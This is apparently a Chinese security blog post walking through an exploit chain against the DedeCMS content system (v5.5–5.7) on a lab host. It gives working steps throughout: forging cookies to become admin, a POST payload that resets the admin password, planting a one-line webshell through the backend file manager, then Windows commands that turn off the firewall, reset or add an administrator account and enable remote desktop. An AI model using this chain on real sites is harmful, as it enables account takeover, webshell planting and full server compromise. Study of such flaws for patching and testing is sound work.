DEDECMS 漏洞汇总

---

日期：2019-08-08 10:20:28
更新：
作者：Bay0net
介绍：

---

0x01、组合拳拿 shell

漏洞版本：v5.5 - v5.7

前台任意用户密码重置

首先注册一个账户，账户名为 0000001，此处注册的账户，前面是多个 0，后面是 1 就行。

注册链接：
http://192.168.31.59/member/index_do.php?fmdo=user&dopost=regnew

注册完成后，登录，登录完以后访问个人主页：
http://192.168.31.59/member/index.php?uid=0000001

查看当前的 cookie：


把 DedeUserID 改成自己的账户名，0000001。
把 DedeUserID__ckMd5 改成 last_vid__ckMd5 的值。

修改后：


修改完成以后，访问个人主页，发现自己已经变成了 admin。
个人主页：http://192.168.31.59/member/



此时，我们已经利用 admin 权限登录到了前台，但是不知道 admin 的密码，如果想修改 admin 的密码，必须知道原密码，所以我们需要利用漏洞来重置前台 admin 用户的密码。

前台用户密码重置

把 burp 打开，然后利用下面的 payload，拿到修改密码的链接。

利用 hackerbar 去发送 payloa。



# URL
http://192.168.31.59/member/resetpassword.php

# POST 的数据
dopost=safequestion&safequestion=0.0&safeanswer=&id=1

放过 POST 的数据包，burp 就会抓到修改密码的数据包。


在浏览器中访问，即可重置用户的密码。（忘了截图，网上找了个，注意 IP 地址要改成自己的。）


此时，我们拥有了前台 admin 账户的密码。

修改后台 admin 密码

dedecms 在修改密码时，如果前台的用户是 admin，那么前台修改 admin 的密码，后台 admin 的密码也会变。

访问下面的页面，修改 admin 的密码，前后台 admin 密码会一起修改。
http://192.168.31.59/member/edit_baseinfo.php

利用修改的密码登录后台：
http://192.168.31.59/dede

后台拿 shell

访问后台，利用刚才修改的密码登录。
后台地址：192.168.31.59/dede/

依次选择模块 -> 文件管理器 -> 新建文件


写入一句话，然后保存。


成功上传一句话，可以执行。


提权

菜刀连接一句话，使用虚拟终端执行以下命令。

# 使用命令关闭防火墙
netsh advfirewall set allprofiles state off

# 重置管理员密码
net user administrator qwe123...

# 也可以新建账户，提到管理员组。
# 不如直接重置管理员密码方便，密码复杂度有问题的话新建还会出错。
net user gp001 qwe123... /add
net localgroup administrators gp001 /add

# 如果没开 3389 的话，需要用命令开启 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

利用刚才新建的账户/密码，或者重置的管理员密码，远程连接即可。